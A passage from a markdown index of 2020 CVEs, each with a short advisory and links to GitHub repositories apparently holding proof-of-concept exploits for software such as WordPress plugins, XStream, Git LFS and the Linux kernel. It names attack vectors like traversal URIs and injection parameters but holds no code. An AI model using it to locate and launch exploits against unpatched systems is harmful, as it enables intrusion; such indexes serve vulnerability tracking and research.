### CVE-2020-25134 (2020-09-25)
An issue was discovered in Observium Professional, Enterprise & Community 20.8.10631. It is vulnerable to directory traversal and local file inclusion due to the fact that there is an unrestricted possibility of loading any file with an inc.php extension. Inclusion of other files (even though limited to the mentioned extension) can lead to Remote Code Execution. This can occur via /settings/?format=../ URIs to pages/settings.inc.php.
- [ynsmroztas/CVE-2020-25134](https://github.com/ynsmroztas/CVE-2020-25134)
### CVE-2020-25200 (2020-10-01)
Pritunl 1.29.2145.25 allows attackers to enumerate valid VPN usernames via a series of /auth/session login attempts. Initially, the server will return error 401. However, if the username is valid, then after 20 login attempts, the server will start responding with error 400. Invalid usernames will receive error 401 indefinitely. Note: This has been disputed by the vendor as not a vulnerability. They argue that this is an intended design
- [lukaszstu/pritunl-CVE-2020-25200](https://github.com/lukaszstu/pritunl-CVE-2020-25200)
### CVE-2020-25213 (2020-09-09)
The File Manager (wp-file-manager) plugin before 6.9 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory. This was exploited in the wild in August and September 2020.
- [mansoorr123/wp-file-manager-CVE-2020-25213](https://github.com/mansoorr123/wp-file-manager-CVE-2020-25213)
- [kakamband/WPKiller](https://github.com/kakamband/WPKiller)
- [forse01/CVE-2020-25213-Wordpress](https://github.com/forse01/CVE-2020-25213-Wordpress)
- [0000000O0Oo/Wordpress-CVE-2020-25213](https://github.com/0000000O0Oo/Wordpress-CVE-2020-25213)
- [piruprohacking/CVE-2020-25213](https://github.com/piruprohacking/CVE-2020-25213)
- [b1ackros337/CVE-2020-25213](https://github.com/b1ackros337/CVE-2020-25213)
- [BLY-Coder/Python-exploit-CVE-2020-25213](https://github.com/BLY-Coder/Python-exploit-CVE-2020-25213)
- [E1tex/Python-CVE-2020-25213](https://github.com/E1tex/Python-CVE-2020-25213)
- [Nguyen-id/CVE-2020-25213](https://github.com/Nguyen-id/CVE-2020-25213)
### CVE-2020-25223 (2020-09-25)
A remote code execution vulnerability exists in the WebAdmin of Sophos SG UTM before v9.705 MR5, v9.607 MR7, and v9.511 MR11
- [darrenmartyn/sophucked](https://github.com/darrenmartyn/sophucked)
- [twentybel0w/CVE-2020-25223](https://github.com/twentybel0w/CVE-2020-25223)
- [reneww/poc-CVE-2020-25223](https://github.com/reneww/poc-CVE-2020-25223)
### CVE-2020-25265 (2020-12-02)
AppImage libappimage before 1.0.3 allows attackers to trigger an overwrite of a system-installed .desktop file by providing a .desktop file that contains Name= with path components.
- [refi64/CVE-2020-25265-25266](https://github.com/refi64/CVE-2020-25265-25266)
### CVE-2020-25270 (2020-10-08)
PHPGurukul hostel-management-system 2.1 allows XSS via Guardian Name, Guardian Relation, Guardian Contact no, Address, or City.
- [Ko-kn3t/CVE-2020-25270](https://github.com/Ko-kn3t/CVE-2020-25270)
### CVE-2020-25271 (2020-10-08)
PHPGurukul hospital-management-system-in-php 4.0 allows XSS via admin/patient-search.php, doctor/search.php, book-appointment.php, doctor/appointment-history.php, or admin/appointment-history.php.
- [Ko-kn3t/CVE-2020-25271](https://github.com/Ko-kn3t/CVE-2020-25271)
### CVE-2020-25272 (2020-10-08)
In SourceCodester Online Bus Booking System 1.0, there is XSS through the name parameter in book_now.php.
- [Ko-kn3t/CVE-2020-25272](https://github.com/Ko-kn3t/CVE-2020-25272)
### CVE-2020-25273 (2020-10-08)
In SourceCodester Online Bus Booking System 1.0, there is Authentication bypass on the Admin Login screen in admin.php via username or password SQL injection.
- [Ko-kn3t/CVE-2020-25273](https://github.com/Ko-kn3t/CVE-2020-25273)
### CVE-2020-25398 (2020-11-05)
CSV Injection exists in InterMind iMind Server through 3.13.65 via the csv export functionality.
- [h3llraiser/CVE-2020-25398](https://github.com/h3llraiser/CVE-2020-25398)
### CVE-2020-25399 (2020-11-05)
Stored XSS in InterMind iMind Server through 3.13.65 allows any user to hijack another user's session by sending a malicious file in the chat.
- [h3llraiser/CVE-2020-25399](https://github.com/h3llraiser/CVE-2020-25399)
### CVE-2020-25478
- [santokum/CVE-2020-25478--ASUS-RT-AC87U-TFTP-is-vulnerable-to-Denial-of-Service-DoS-attack](https://github.com/santokum/CVE-2020-25478--ASUS-RT-AC87U-TFTP-is-vulnerable-to-Denial-of-Service-DoS-attack)
### CVE-2020-25487 (2020-09-22)
PHPGURUKUL Zoo Management System Using PHP and MySQL version 1.0 is affected by: SQL Injection via zms/animal-detail.php.
- [Ko-kn3t/CVE-2020-25487](https://github.com/Ko-kn3t/CVE-2020-25487)
### CVE-2020-25488
- [Ko-kn3t/CVE-2020-25488](https://github.com/Ko-kn3t/CVE-2020-25488)
### CVE-2020-25498 (2021-01-06)
Cross Site Scripting (XSS) vulnerability in Beetel router 777VR1 can be exploited via the NTP server name in System Time and "Keyword" in URL Filter.
- [the-girl-who-lived/CVE-2020-25498](https://github.com/the-girl-who-lived/CVE-2020-25498)
### CVE-2020-25514 (2020-09-22)
Sourcecodester Simple Library Management System 1.0 is affected by Incorrect Access Control via the Login Panel, http://<site>/lms/admin.php.
- [Ko-kn3t/CVE-2020-25514](https://github.com/Ko-kn3t/CVE-2020-25514)
### CVE-2020-25515 (2020-09-22)
Sourcecodester Simple Library Management System 1.0 is affected by Insecure Permissions via Books > New Book , http://<site>/lms/index.php?page=books.
- [Ko-kn3t/CVE-2020-25515](https://github.com/Ko-kn3t/CVE-2020-25515)
### CVE-2020-25518
- [g-rubert/wordpress_DoS](https://github.com/g-rubert/wordpress_DoS)
### CVE-2020-25540 (2020-09-14)
ThinkAdmin v6 is affected by a directory traversal vulnerability. An unauthorized attacker can read arbitrarily file on a remote server via GET request encode parameter.
- [Schira4396/CVE-2020-25540](https://github.com/Schira4396/CVE-2020-25540)
- [RajChowdhury240/ThinkAdmin-CVE-2020-25540](https://github.com/RajChowdhury240/ThinkAdmin-CVE-2020-25540)
- [lowkey0808/cve-2020-25540](https://github.com/lowkey0808/cve-2020-25540)
- [simonlee-hello/CVE-2020-25540](https://github.com/simonlee-hello/CVE-2020-25540)
### CVE-2020-25578 (2021-03-26)
In FreeBSD 12.2-STABLE before r368969, 11.4-STABLE before r369047, 12.2-RELEASE before p3, 12.1-RELEASE before p13 and 11.4-RELEASE before p7 several file systems were not properly initializing the d_off field of the dirent structures returned by VOP_READDIR. In particular, tmpfs(5), smbfs(5), autofs(5) and mqueuefs(5) were failing to do so. As a result, eight uninitialized kernel stack bytes may be leaked to userspace by these file systems.
- [farazsth98/freebsd-dirent-info-leak-bugs](https://github.com/farazsth98/freebsd-dirent-info-leak-bugs)
### CVE-2020-25613 (2020-10-06)
An issue was discovered in Ruby through 2.5.8, 2.6.x through 2.6.6, and 2.7.x through 2.7.1. WEBrick, a simple HTTP server bundled with Ruby, had not checked the transfer-encoding header value rigorously. An attacker may potentially exploit this issue to bypass a reverse proxy (which also has a poor header check), which may lead to an HTTP Request Smuggling attack.
- [metapox/CVE-2020-25613](https://github.com/metapox/CVE-2020-25613)
### CVE-2020-25627 (2020-12-09)
The moodlenetprofile user profile field required extra sanitizing to prevent a stored XSS risk. This affects versions 3.9 to 3.9.1. Fixed in 3.9.2.
- [HoangKien1020/CVE-2020-25627](https://github.com/HoangKien1020/CVE-2020-25627)
### CVE-2020-25632 (2021-03-03)
A flaw was found in grub2 in versions prior to 2.06. The rmmod implementation allows the unloading of a module used as a dependency without checking if any other dependent module is still loaded leading to a use-after-free scenario. This could allow arbitrary code to be executed or a bypass of Secure Boot protections. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
- [pauljrowland/BootHoleFix](https://github.com/pauljrowland/BootHoleFix)
### CVE-2020-25637 (2020-10-06)
A double free memory issue was found to occur in the libvirt API, in versions before 6.8.0, responsible for requesting information about network interfaces of a running QEMU domain. This flaw affects the polkit access control driver. Specifically, clients connecting to the read-write socket with limited ACL permissions could use this flaw to crash the libvirt daemon, resulting in a denial of service, or potentially escalate their privileges on the system. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
- [brahmiboudjema/CVE-2020-25637-libvirt-double-free](https://github.com/brahmiboudjema/CVE-2020-25637-libvirt-double-free)
### CVE-2020-25668 (2021-05-26)
A flaw was found in Linux Kernel because access to the global variable fg_console is not properly synchronized leading to a use after free in con_font_op.
- [hshivhare67/Kernel_4.1.15_CVE-2020-25668](https://github.com/hshivhare67/Kernel_4.1.15_CVE-2020-25668)
### CVE-2020-25686 (2021-01-20)
A flaw was found in dnsmasq before version 2.83. When receiving a query, dnsmasq does not check for an existing pending request for the same name and forwards a new request. By default, a maximum of 150 pending queries can be sent to upstream servers, so there can be at most 150 queries for the same name. This flaw allows an off-path attacker on the network to substantially reduce the number of attempts that it would have to perform to forge a reply and have it accepted by dnsmasq. This issue is mentioned in the "Birthday Attacks" section of RFC5452. If chained with CVE-2020-25684, the attack complexity of a successful attack is reduced. The highest threat from this vulnerability is to data integrity.
- [knqyf263/dnspooq](https://github.com/knqyf263/dnspooq)
### CVE-2020-25705 (2020-11-17)
A flaw in ICMP packets in the Linux kernel may allow an attacker to quickly scan open UDP ports. This flaw allows an off-path remote attacker to effectively bypass source port UDP randomization. Software that relies on UDP source port randomization are indirectly affected as well on the Linux Based Products (RUGGEDCOM RM1224: All versions between v5.0 and v6.4, SCALANCE M-800: All versions between v5.0 and v6.4, SCALANCE S615: All versions between v5.0 and v6.4, SCALANCE SC-600: All versions prior to v2.1.3, SCALANCE W1750D: v8.3.0.1, v8.6.0, and v8.7.0, SIMATIC Cloud Connect 7: All versions, SIMATIC MV500 Family: All versions, SIMATIC NET CP 1243-1 (incl. SIPLUS variants): Versions 3.1.39 and later, SIMATIC NET CP 1243-7 LTE EU: Version
- [tdwyer/CVE-2020-25705](https://github.com/tdwyer/CVE-2020-25705)
- [nanopathi/linux-4.19.72_CVE-2020-25705](https://github.com/nanopathi/linux-4.19.72_CVE-2020-25705)
### CVE-2020-25747 (2020-09-25)
The Telnet service of Rubetek RV-3406, RV-3409, and RV-3411 cameras (firmware versions v342, v339) can allow a remote attacker to gain access to RTSP and ONFIV services without authentication. Thus, the attacker can watch live streams from the camera, rotate the camera, change some settings (brightness, clarity, time), restart the camera, or reset it to factory settings.
- [jet-pentest/CVE-2020-25747](https://github.com/jet-pentest/CVE-2020-25747)
### CVE-2020-25748 (2020-09-25)
A Cleartext Transmission issue was discovered on Rubetek RV-3406, RV-3409, and RV-3411 cameras (firmware versions v342, v339). Someone in the middle can intercept and modify the video data from the camera, which is transmitted in an unencrypted form. One can also modify responses from NTP and RTSP servers and force the camera to use the changed values.
- [jet-pentest/CVE-2020-25748](https://github.com/jet-pentest/CVE-2020-25748)
### CVE-2020-25749 (2020-09-25)
The Telnet service of Rubetek cameras RV-3406, RV-3409, and RV-3411 cameras (firmware versions v342, v339) could allow an remote attacker to take full control of the device with a high-privileged account. The vulnerability exists because a system account has a default and static password. The Telnet service cannot be disabled and this password cannot be changed via standard functionality.
- [jet-pentest/CVE-2020-25749](https://github.com/jet-pentest/CVE-2020-25749)
### CVE-2020-25769
- [defrancescojp/CVE-2020-25769](https://github.com/defrancescojp/CVE-2020-25769)
### CVE-2020-25782 (2021-01-28)
An issue was discovered on Accfly Wireless Security IR Camera 720P System with software versions v3.10.73 through v4.15.77. There is an unauthenticated stack-based buffer overflow in the function CNetClientManage::ServerIP_Proto_Set during incoming message handling.
- [tezeb/accfly](https://github.com/tezeb/accfly)
### CVE-2020-25790 (2020-09-19)
Typesetter CMS 5.x through 5.1 allows admins to upload and execute arbitrary PHP code via a .php file inside a ZIP archive. NOTE: the vendor disputes the significance of this report because "admins are considered trustworthy"; however, the behavior "contradicts our security policy" and is being fixed for 5.2
- [7Mitu/CVE-2020-25790](https://github.com/7Mitu/CVE-2020-25790)
### CVE-2020-25860 (2020-12-21)
The install.c module in the Pengutronix RAUC update client prior to version 1.5 has a Time-of-Check Time-of-Use vulnerability, where signature verification on an update file takes place before the file is reopened for installation. An attacker who can modify the update file just before it is reopened can install arbitrary code on the device.
- [rauc/rauc-1.5-integration](https://github.com/rauc/rauc-1.5-integration)
### CVE-2020-25867 (2020-10-07)
SoPlanning before 1.47 doesn't correctly check the security key used to publicly share plannings. It allows a bypass to get access without authentication.
- [thomasfady/CVE-2020-25867](https://github.com/thomasfady/CVE-2020-25867)
### CVE-2020-26061 (2020-10-05)
ClickStudios Passwordstate Password Reset Portal prior to build 8501 is affected by an authentication bypass vulnerability. The ResetPassword function does not validate whether the user has successfully authenticated using security questions. An unauthenticated, remote attacker can send a crafted HTTP request to the /account/ResetPassword page to set a new password for any registered user.
- [missing0x00/CVE-2020-26061](https://github.com/missing0x00/CVE-2020-26061)
### CVE-2020-26217 (2020-11-16)
XStream before version 1.4.14 is vulnerable to Remote Code Execution.The vulnerability may allow a remote attacker to run arbitrary shell commands only by manipulating the processed input stream. Only users who rely on blocklists are affected. Anyone using XStream's Security Framework allowlist is not affected. The linked advisory provides code workarounds for users who cannot upgrade. The issue is fixed in version 1.4.14.
- [novysodope/CVE-2020-26217-XStream-RCE-POC](https://github.com/novysodope/CVE-2020-26217-XStream-RCE-POC)
- [Al1ex/CVE-2020-26217](https://github.com/Al1ex/CVE-2020-26217)
- [epicosy/XStream-1](https://github.com/epicosy/XStream-1)
### CVE-2020-26233 (2020-12-08)
Git Credential Manager Core (GCM Core) is a secure Git credential helper built on .NET Core that runs on Windows and macOS. In Git Credential Manager Core before version 2.0.289, when recursively cloning a Git repository on Windows with submodules, Git will first clone the top-level repository and then recursively clone all submodules by starting new Git processes from the top-level working directory. If a malicious git.exe executable is present in the top-level repository then this binary will be started by Git Credential Manager Core when attempting to read configuration, and not git.exe as found on the %PATH%. This only affects GCM Core on Windows, not macOS or Linux-based distributions. GCM Core version 2.0.289 contains the fix for this vulnerability, and is available from the project's GitHub releases page. GCM Core 2.0.289 is also bundled in the latest Git for Windows release; version 2.29.2(3). As a workaround, users should avoid recursively cloning untrusted repositories with the --recurse-submodules option.
- [whr819987540/test_CVE-2020-26233](https://github.com/whr819987540/test_CVE-2020-26233)
- [an1p3lg5/CVE-2020-26233](https://github.com/an1p3lg5/CVE-2020-26233)
### CVE-2020-26258 (2020-12-16)
XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.15, a Server-Side Forgery Request vulnerability can be activated when unmarshalling. The vulnerability may allow a remote attacker to request data from internal resources that are not publicly available only by manipulating the processed input stream. If you rely on XStream's default blacklist of the Security Framework, you will have to use at least version 1.4.15. The reported vulnerability does not exist if running Java 15 or higher. No user is affected who followed the recommendation to setup XStream's Security Framework with a whitelist! Anyone relying on XStream's default blacklist can immediately switch to a whilelist for the allowed types to avoid the vulnerability. Users of XStream 1.4.14 or below who still want to use XStream default blacklist can use a workaround described in more detailed in the referenced advisories.
- [Al1ex/CVE-2020-26258](https://github.com/Al1ex/CVE-2020-26258)
### CVE-2020-26259 (2020-12-16)
XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.15, is vulnerable to an Arbitrary File Deletion on the local host when unmarshalling. The vulnerability may allow a remote attacker to delete arbitrary know files on the host as log as the executing process has sufficient rights only by manipulating the processed input stream. If you rely on XStream's default blacklist of the Security Framework, you will have to use at least version 1.4.15. The reported vulnerability does not exist running Java 15 or higher. No user is affected, who followed the recommendation to setup XStream's Security Framework with a whitelist! Anyone relying on XStream's default blacklist can immediately switch to a whilelist for the allowed types to avoid the vulnerability. Users of XStream 1.4.14 or below who still want to use XStream default blacklist can use a workaround described in more detailed in the referenced advisories.
- [jas502n/CVE-2020-26259](https://github.com/jas502n/CVE-2020-26259)
- [Al1ex/CVE-2020-26259](https://github.com/Al1ex/CVE-2020-26259)
### CVE-2020-26413 (2020-12-11)
An issue has been discovered in GitLab CE/EE affecting all versions starting from 13.4 before 13.6.2. Information disclosure via GraphQL results in user email being unexpectedly visible.
- [Kento-Sec/GitLab-Graphql-CVE-2020-26413](https://github.com/Kento-Sec/GitLab-Graphql-CVE-2020-26413)
### CVE-2020-26525 (2020-10-02)
Damstra Smart Asset 2020.7 has SQL injection via the API/api/Asset originator parameter. This allows forcing the database and server to initiate remote connections to third party DNS servers.
- [lukaszstu/SmartAsset-SQLinj-CVE-2020-26525](https://github.com/lukaszstu/SmartAsset-SQLinj-CVE-2020-26525)
### CVE-2020-26526 (2020-10-02)
An issue was discovered in Damstra Smart Asset 2020.7. It is possible to enumerate valid usernames on the login page. The application sends a different server response when the username is invalid than when the username is valid ("Unable to find an APIDomain" versus "Wrong email or password").
- [lukaszstu/SmartAsset-UE-CVE-2020-26526](https://github.com/lukaszstu/SmartAsset-UE-CVE-2020-26526)
### CVE-2020-26527 (2020-10-02)
An issue was discovered in API/api/Version in Damstra Smart Asset 2020.7. Cross-origin resource sharing trusts random origins by accepting the arbitrary 'Origin: example.com' header and responding with 200 OK and a wildcard 'Access-Control-Allow-Origin: *' header.
- [lukaszstu/SmartAsset-CORS-CVE-2020-26527](https://github.com/lukaszstu/SmartAsset-CORS-CVE-2020-26527)
### CVE-2020-26732 (2021-01-14)
SKYWORTH GN542VF Hardware Version 2.0 and Software Version 2.0.0.16 does not set the Secure flag for the session cookie in an HTTPS session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an HTTP session.
- [swzhouu/CVE-2020-26732](https://github.com/swzhouu/CVE-2020-26732)
### CVE-2020-26733 (2021-01-14)
Cross Site Scripting (XSS) in Configuration page in SKYWORTH GN542VF Hardware Version 2.0 and Software Version 2.0.0.16 allows authenticated attacker to inject their own script into the page via DDNS Configuration Section.
- [swzhouu/CVE-2020-26733](https://github.com/swzhouu/CVE-2020-26733)
### CVE-2020-26878 (2020-10-26)
Ruckus through 1.5.1.0.21 is affected by remote command injection. An authenticated user can submit a query to the API (/service/v1/createUser endpoint), injecting arbitrary commands that will be executed as root user via web.py.
- [htarsoo/CVE-2020-26878](https://github.com/htarsoo/CVE-2020-26878)
### CVE-2020-27190
- [qlh831/x-CVE-2020-27190](https://github.com/qlh831/x-CVE-2020-27190)
### CVE-2020-27194 (2020-10-16)
An issue was discovered in the Linux kernel before 5.8.15. scalar32_min_max_or in kernel/bpf/verifier.c mishandles bounds tracking during use of 64-bit values, aka CID-5b9fbeb75b6a.
- [willinin/CVE-2020-27194-exp](https://github.com/willinin/CVE-2020-27194-exp)
- [xmzyshypnc/CVE-2020-27194](https://github.com/xmzyshypnc/CVE-2020-27194)
### CVE-2020-27199 (2020-12-17)
The Magic Home Pro application 1.5.1 for Android allows Authentication Bypass. The security control that the application currently has in place is a simple Username and Password authentication function. Using enumeration, an attacker is able to forge a User specific token without the need for correct password to gain access to the mobile application as that victim user.
- [9lyph/CVE-2020-27199](https://github.com/9lyph/CVE-2020-27199)
### CVE-2020-27223 (2021-02-26)
In Eclipse Jetty 9.4.6.v20170531 to 9.4.36.v20210114 (inclusive), 10.0.0, and 11.0.0 when Jetty handles a request containing multiple Accept headers with a large number of “quality” (i.e. q) parameters, the server may enter a denial of service (DoS) state due to high CPU usage processing those quality values, resulting in minutes of CPU time exhausted processing those quality values.
- [motikan2010/CVE-2020-27223](https://github.com/motikan2010/CVE-2020-27223)
- [ttestoo/Jetty-CVE-2020-27223](https://github.com/ttestoo/Jetty-CVE-2020-27223)
- [hshivhare67/Jetty_v9.4.31_CVE-2020-27223_beforepatch](https://github.com/hshivhare67/Jetty_v9.4.31_CVE-2020-27223_beforepatch)
- [hshivhare67/Jetty_v9.4.31_CVE-2020-27223](https://github.com/hshivhare67/Jetty_v9.4.31_CVE-2020-27223)
### CVE-2020-27252 (2020-12-14)
Medtronic MyCareLink Smart 25000 all versions are vulnerable to a race condition in the MCL Smart Patient Reader software update system, which allows unsigned firmware to be uploaded and executed on the Patient Reader. If exploited an attacker could remotely execute code on the MCL Smart Patient Reader device, leading to control of the device.
- [OccultSlolem/GatorMed](https://github.com/OccultSlolem/GatorMed)
### CVE-2020-27301 (2021-06-04)
A stack buffer overflow in Realtek RTL8710 (and other Ameba-based devices) can lead to remote code execution via the "AES_UnWRAP" function, when an attacker in Wi-Fi range sends a crafted "Encrypted GTK" value as part of the WPA2 4-way-handshake.
- [chertoGUN/CVE-2020-27301-hostapd](https://github.com/chertoGUN/CVE-2020-27301-hostapd)
### CVE-2020-27358 (2020-10-31)
An issue was discovered in REDCap 8.11.6 through 9.x before 10. The messenger's CSV feature (that allows users to export their conversation threads as CSV) allows non-privileged users to export one another's conversation threads by changing the thread_id parameter in the request to the endpoint Messenger/messenger_download_csv.php?title=Hey&thread_id={THREAD_ID}.
- [sebastian-mora/cve-2020-27358-27359](https://github.com/sebastian-mora/cve-2020-27358-27359)
### CVE-2020-27368 (2021-01-14)
Directory Indexing in Login Portal of Login Portal of TOTOLINK-A702R-V1.0.0-B20161227.1023 allows attacker to access /icons/ directories via GET Parameter.
- [swzhouu/CVE-2020-27368](https://github.com/swzhouu/CVE-2020-27368)
### CVE-2020-27603 (2020-10-21)
BigBlueButton before 2.2.27 has an unsafe JODConverter setting in which LibreOffice document conversions can access external files.
- [hannob/CVE-2020-27603-bbb-libreoffice-poc](https://github.com/hannob/CVE-2020-27603-bbb-libreoffice-poc)
### CVE-2020-27688 (2020-11-05)
RVToolsPasswordEncryption.exe in RVTools 4.0.6 allows users to encrypt passwords to be used in the configuration files. This encryption used a static IV and key, and thus using the Decrypt() method from VISKD.cs from the RVTools.exe executable allows for decrypting the encrypted passwords. The accounts used in the configuration files have access to vSphere instances.
- [matthiasmaes/CVE-2020-27688](https://github.com/matthiasmaes/CVE-2020-27688)
### CVE-2020-27747 (2020-10-29)
An issue was discovered in Click Studios Passwordstate 8.9 (Build 8973).If the user of the system has assigned himself a PIN code for entering from a mobile device using the built-in generator (4 digits), a remote attacker has the opportunity to conduct a brute force attack on this PIN code. As result, remote attacker retrieves all passwords from another systems, available for affected account.
- [jet-pentest/CVE-2020-27747](https://github.com/jet-pentest/CVE-2020-27747)
### CVE-2020-27786 (2020-12-11)
A flaw was found in the Linux kernel’s implementation of MIDI, where an attacker with a local account and the permissions to issue ioctl commands to midi devices could trigger a use-after-free issue. A write to this specific memory while freed and before use causes the flow of execution to change and possibly allow for memory corruption or privilege escalation. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
- [kiks7/CVE-2020-27786-Kernel-Exploit](https://github.com/kiks7/CVE-2020-27786-Kernel-Exploit)
- [elbiazo/CVE-2020-27786](https://github.com/elbiazo/CVE-2020-27786)
- [Trinadh465/linux-4.19.72_CVE-2020-27786](https://github.com/Trinadh465/linux-4.19.72_CVE-2020-27786)
- [ii4gsp/CVE-2020-27786](https://github.com/ii4gsp/CVE-2020-27786)
### CVE-2020-27815 (2021-05-26)
A flaw was found in the JFS filesystem code in the Linux Kernel which allows a local attacker with the ability to set extended attributes to panic the system, causing memory corruption or escalating privileges. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
- [Trinadh465/linux-4.19.72_CVE-2020-27815](https://github.com/Trinadh465/linux-4.19.72_CVE-2020-27815)
### CVE-2020-27824 (2021-05-13)
A flaw was found in OpenJPEG’s encoder in the opj_dwt_calc_explicit_stepsizes() function. This flaw allows an attacker who can supply crafted input to decomposition levels to cause a buffer overflow. The highest threat from this vulnerability is to system availability.
- [pazhanivel07/openjpeg-2.3.0_CVE-2020-27824](https://github.com/pazhanivel07/openjpeg-2.3.0_CVE-2020-27824)
### CVE-2020-27838 (2021-03-08)
A flaw was found in keycloak in versions prior to 13.0.0. The client registration endpoint allows fetching information about PUBLIC clients (like client secret) without authentication which could be an issue if the same PUBLIC client changed to CONFIDENTIAL later. The highest threat from this vulnerability is to data confidentiality.
- [Cappricio-Securities/CVE-2020-27838](https://github.com/Cappricio-Securities/CVE-2020-27838)
### CVE-2020-27904 (2020-12-08)
A logic issue existed resulting in memory corruption. This was addressed with improved state management. This issue is fixed in macOS Big Sur 11.0.1. An application may be able to execute arbitrary code with kernel privileges.
- [pattern-f/xattr-oob-swap](https://github.com/pattern-f/xattr-oob-swap)
### CVE-2020-27930 (2020-12-08)
A memory corruption issue was addressed with improved input validation. This issue is fixed in macOS Big Sur 11.0.1, watchOS 7.1, iOS 12.4.9, watchOS 6.2.9, Security Update 2020-006 High Sierra, Security Update 2020-006 Mojave, iOS 14.2 and iPadOS 14.2, watchOS 5.3.9, macOS Catalina 10.15.7 Supplemental Update, macOS Catalina 10.15.7 Update. Processing a maliciously crafted font may lead to arbitrary code execution.
- [FunPhishing/Apple-Safari-Remote-Code-Execution-CVE-2020-27930](https://github.com/FunPhishing/Apple-Safari-Remote-Code-Execution-CVE-2020-27930)
### CVE-2020-27935 (2021-04-02)
Multiple issues were addressed with improved logic. This issue is fixed in iOS 14.2 and iPadOS 14.2, macOS Big Sur 11.0.1, watchOS 7.1, tvOS 14.2. A sandboxed process may be able to circumvent sandbox restrictions.
- [LIJI32/SnatchBox](https://github.com/LIJI32/SnatchBox)
### CVE-2020-27949 (2021-04-02)
This issue was addressed with improved checks to prevent unauthorized actions. This issue is fixed in macOS Big Sur 11.1, Security Update 2020-001 Catalina, Security Update 2020-007 Mojave. A malicious application may cause unexpected changes in memory belonging to processes traced by DTrace.
- [seemoo-lab/dtrace-memaccess_cve-2020-27949](https://github.com/seemoo-lab/dtrace-memaccess_cve-2020-27949)
### CVE-2020-27950 (2020-12-08)
A memory initialization issue was addressed. This issue is fixed in macOS Big Sur 11.0.1, watchOS 7.1, iOS 12.4.9, watchOS 6.2.9, Security Update 2020-006 High Sierra, Security Update 2020-006 Mojave, iOS 14.2 and iPadOS 14.2, watchOS 5.3.9, macOS Catalina 10.15.7 Supplemental Update, macOS Catalina 10.15.7 Update. A malicious application may be able to disclose kernel memory.
- [synacktiv/CVE-2020-27950](https://github.com/synacktiv/CVE-2020-27950)
- [lyonzon2/browser-crash-tool](https://github.com/lyonzon2/browser-crash-tool)
### CVE-2020-27955 (2020-11-05)
Git LFS 2.12.0 allows Remote Code Execution.
- [ExploitBox/git-lfs-RCE-exploit-CVE-2020-27955](https://github.com/ExploitBox/git-lfs-RCE-exploit-CVE-2020-27955)
- [ExploitBox/git-lfs-RCE-exploit-CVE-2020-27955-Go](https://github.com/ExploitBox/git-lfs-RCE-exploit-CVE-2020-27955-Go)
- [yhsung/cve-2020-27955-poc](https://github.com/yhsung/cve-2020-27955-poc)
- [r00t4dm/CVE-2020-27955](https://github.com/r00t4dm/CVE-2020-27955)
- [shubham0d/CVE-2020-27955](https://github.com/shubham0d/CVE-2020-27955)
- [TheTh1nk3r/cve-2020-27955](https://github.com/TheTh1nk3r/cve-2020-27955)
- [NeoDarwin/CVE-2020-27955](https://github.com/NeoDarwin/CVE-2020-27955)
- [DeeLMind/CVE-2020-27955-LFS](https://github.com/DeeLMind/CVE-2020-27955-LFS)
- [HK69s/CVE-2020-27955](https://github.com/HK69s/CVE-2020-27955)
- [IanSmith123/CVE-2020-27955](https://github.com/IanSmith123/CVE-2020-27955)
- [Arnoldqqq/CVE-2020-27955](https://github.com/Arnoldqqq/CVE-2020-27955)
- [nob0dy-3389/CVE-2020-27955](https://github.com/nob0dy-3389/CVE-2020-27955)
- [Marsable/CVE-2020-27955-LFS](https://github.com/Marsable/CVE-2020-27955-LFS)
- [FrostsaberX/CVE-2020-27955](https://github.com/FrostsaberX/CVE-2020-27955)
- [whitetea2424/CVE-2020-27955-LFS-main](https://github.com/whitetea2424/CVE-2020-27955-LFS-main)
- [userxfan/cve-2020-27955](https://github.com/userxfan/cve-2020-27955)
- [z50913/CVE-2020-27955](https://github.com/z50913/CVE-2020-27955)
- [Kimorea/CVE-2020-27955-LFS](https://github.com/Kimorea/CVE-2020-27955-LFS)
### CVE-2020-27976 (2020-10-28)
osCommerce Phoenix CE before 1.0.5.4 allows OS command injection remotely. Within admin/mail.php, a from POST parameter can be passed to the application. This affects the PHP mail function, and the sendmail -f option.
- [k0rnh0li0/CVE-2020-27976](https://github.com/k0rnh0li0/CVE-2020-27976)
### CVE-2020-28018 (2021-05-06)
Exim 4 before 4.94.2 allows Use After Free in smtp_reset in certain situations that may be common for builds with OpenSSL.
- [dorkerdevil/CVE-2020-28018](https://github.com/dorkerdevil/CVE-2020-28018)
- [zr0tt/CVE-2020-28018](https://github.com/zr0tt/CVE-2020-28018)
### CVE-2020-28032 (2020-10-31)
WordPress before 5.5.2 mishandles deserialization requests in wp-includes/Requests/Utility/FilteredIterator.php.
- [nth347/CVE-2020-28032_PoC](https://github.com/nth347/CVE-2020-28032_PoC)
### CVE-2020-28052 (2020-12-18)
An issue was discovered in Legion of the Bouncy Castle BC Java 1.65 and 1.66. The OpenBSDBCrypt.checkPassword utility method compared incorrect data when checking the password, allowing incorrect passwords to indicate they were matching with previously hashed ones that were different.
- [madstap/bouncy-castle-generative-test-poc](https://github.com/madstap/bouncy-castle-generative-test-poc)
- [kurenaif/CVE-2020-28052_PoC](https://github.com/kurenaif/CVE-2020-28052_PoC)
### CVE-2020-28054 (2020-11-19)
JamoDat TSMManager Collector version up to 6.5.0.21 is vulnerable to an Authorization Bypass because the Collector component is not properly validating an authenticated session with the Viewer. If the Viewer has been modified (binary patched) and the Bypass Login functionality is being used, an attacker can request every Collector's functionality as if they were a properly logged-in user: administrating connected instances, reviewing logs, editing configurations, accessing the instances' consoles, accessing hardware configurations, etc.Exploiting this vulnerability won't grant an attacker access nor control on remote ISP servers as no credentials is sent with the request.
- [VoidSec/Tivoli-Madness](https://github.com/VoidSec/Tivoli-Madness)
### CVE-2020-28148
- [fengchenzxc/CVE-2020-28148](https://github.com/fengchenzxc/CVE-2020-28148)
### CVE-2020-28169 (2020-12-24)
